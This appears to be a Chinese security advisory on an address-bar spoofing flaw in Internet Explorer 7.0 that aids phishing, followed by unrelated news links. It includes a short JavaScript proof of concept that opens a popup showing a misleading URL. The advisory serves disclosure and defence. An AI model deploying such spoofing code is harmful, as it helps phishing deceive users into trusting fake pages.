受影响系统:MicrosoftInternetExplorer7.0描述:BUGTRAQID:28498InternetExplorer是微软发布的非常流行的WEB浏览器。如果用户用IE访问了恶意网页的话,则弹出窗口的地址栏可能为任意地址而窗口主题中为任意页面或内容。这有
受影响系统:
  Microsoft Internet Explorer 7.0   描述:   BUGTRAQ ID: 28498   Internet Explorer是微软发布的非常流行的WEB浏览器。   如果用户用IE访问了恶意网页的话,则弹出窗口的地址栏可能为任意地址而窗口主题中为任意页面或内容。这有助于攻击者执行网络钓鱼攻击。   <*来源:Juan Pablo Lopez Yacubian ([email protected])   链接:http://marc.info/?l=bugtraq&m=120673515616258&w=2   *>   测试方法:   警 告   以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! <script language="JavaScript">
function iniciar()
{ nuevaventana = window.open("", "Win", "width=500,height=500,location=1"); nuevaventana.document.location = "http://www.google.com.ar/#" "www.microsoft.com/"; }
iniciar()
</script>

  建议:   目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:   http://www.microsoft.com/windows/ie/default.asp

最新资讯
任正非:华为现在的问题是机构臃肿 目前正在组织改革

任正非:华为现在的问

华为创始人兼CEO任正非在接受央视《面对面》采访,在谈
任正非:人工智能就是统计学 要提高对统计学重视程度

任正非:人工智能就是

华为创始人兼CEO任正非在接受央视《面对面》采访,当谈
任正非:儿女要自由去飞翔 困难有信心能被解决

任正非:儿女要自由去飞

华为创始人兼CEO任正非在接受央视《面对面》采访时谈
任正非主动放弃100名改革开放杰出贡献对象称号

任正非主动放弃100名

任正非在接受央视《面对面》访问时表示,主动放弃100名
个人所得税App更新:房屋出租人信息不要填了

个人所得税App更新:房

这意味着租客此前遇到的填也难不填也难的困局得以缓和
京东雷动:打破部门墙 主动求变

京东雷动:打破部门墙

“心迷则此岸、心悟则彼岸”,当天,徐雷以这句话结束了他
最新文章
CPU幽灵和熔断漏洞是什么?Intel为大家简单易懂的科普了一番

CPU幽灵和熔断漏洞是

不久前让整全行业紧张、全球用户恐慌的Spectre幽灵、M
解析文件上传漏洞 从FCKEditor文件上传漏洞谈起

解析文件上传漏洞 从F

大部分的用户可能不要了解文件上传漏洞,下面小编就为大
手把手教你如何构造Office漏洞POC(以CVE-2012-0158为例)

手把手教你如何构造Of

近年来APT追踪盛行,最常见的就是各种以钓鱼开始的攻击
漏洞 自动化脚本 论漏洞和自动化脚本的区别

漏洞 自动化脚本 论漏

漏洞无处不在,它是在硬件、软件、协议的具体实现或系统
Python 爬虫修养-处理动态网页

Python 爬虫修养-处理

在爬虫开发中,大家可以很轻易地 bypass 所谓的 UA 限制
黑客通过Paypal可传输恶意图像

黑客通过Paypal可传输

PayPal解决了一个可被黑客用来向支付页面插入恶意图像